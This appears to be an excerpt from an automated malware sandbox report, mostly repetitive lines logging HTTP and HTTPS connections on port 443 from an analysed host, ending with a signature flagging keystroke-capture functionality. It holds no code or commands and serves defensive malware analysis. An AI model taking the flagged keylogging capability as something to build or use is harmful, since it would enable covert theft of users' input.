                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
                                      Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
                                      Source: unknownHTTPS traffic detected: 47.79.48.211:443 -> 192.168.2.4:49732 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49739 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49738 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49744 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.4:49745 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49746 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.4:49747 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49754 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49756 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49794 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49795 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49799 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49798 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.4:49811 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.4:49813 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.4:49816 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.4:49819 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49824 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49821 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49832 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49831 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49835 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49839 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49847 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49848 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49849 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.4:49852 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49851 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.4:49850 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49855 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49854 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49858 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49861 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49864 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49868 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49869 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.4:49870 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49888 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49889 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49892 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49893 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49899 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49897 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49903 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49902 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49912 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49913 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49921 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49922 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49931 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49936 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49937 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49947 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49948 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49955 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49957 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49967 version: TLS 1.2
                                      Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49970 version: TLS 1.2

                                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                                      barindex
                                      Contains functionality to capture and log keystrokes
